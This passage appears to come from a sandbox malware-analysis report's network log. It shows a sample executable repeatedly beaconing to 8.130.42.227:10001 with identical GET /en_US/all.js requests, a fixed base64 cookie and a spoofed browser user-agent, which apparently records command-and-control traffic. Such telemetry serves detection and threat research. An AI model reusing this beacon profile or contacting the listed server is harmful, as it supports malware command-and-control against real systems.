                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:13.878774881 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:13 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                11 | 192.168.2.4 | 49742 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:13.995946884 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:14.961479902 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:14 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                12 | 192.168.2.4 | 49744 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:15.074542046 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:16.042283058 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:15 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                13 | 192.168.2.4 | 49747 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:16.159049988 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:17.115231991 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:16 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                14 | 192.168.2.4 | 49749 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:17.230444908 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:18.198241949 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:18 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                15 | 192.168.2.4 | 49751 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:18.323998928 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:19.277784109 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:19 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                16 | 192.168.2.4 | 49752 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:19.387712955 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:20.348330021 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:20 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                17 | 192.168.2.4 | 49753 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:20.464828014 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:21.432746887 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:21 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                18 | 192.168.2.4 | 49754 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:21.544409037 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:23.040863037 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:22 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                19 | 192.168.2.4 | 49755 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:23.153708935 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:24.109930038 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:23 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                20 | 192.168.2.4 | 49756 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:24.230339050 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:25.186378002 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:25 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                21 | 192.168.2.4 | 49757 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:25.295239925 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:26.245187044 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:26 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                22 | 192.168.2.4 | 49758 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:26.370908976 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:27.329121113 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:27 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                23 | 192.168.2.4 | 49759 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:27.449290991 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:28.415271044 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:28 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                24 | 192.168.2.4 | 49760 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:28.527602911 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:29.481961012 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:29 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                25 | 192.168.2.4 | 49761 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:29.605470896 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:31.127780914 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:30 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                26 | 192.168.2.4 | 49762 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:31.246192932 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:32.766760111 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:32 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                27 | 192.168.2.4 | 49763 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:32.893191099 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:33.850868940 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:33 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                28 | 192.168.2.4 | 49764 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:33.964926004 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:34.933923960 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:34 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                29 | 192.168.2.4 | 49765 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:35.042886019 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:36.009809971 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:35 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                30 | 192.168.2.4 | 49766 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:36.122195005 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:37.091801882 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:36 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                31 | 192.168.2.4 | 49767 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:37.214812040 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:38.179536104 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:38 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                32 | 192.168.2.4 | 49768 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:38.308451891 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:39.265749931 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:39 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                33 | 192.168.2.4 | 49769 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:39.414067030 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:40.358573914 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:40 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                34 | 192.168.2.4 | 49770 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:40.480554104 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:17:41.456600904 CEST | 114 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:17:41 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                35 | 192.168.2.4 | 49771 | 8.130.42.227 | 10001 | 6992 | C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 1, 2024 09:17:41.574184895 CEST | 404 | OUT | GET /en_US/all.js HTTP/1.1
                                                                Accept: */*
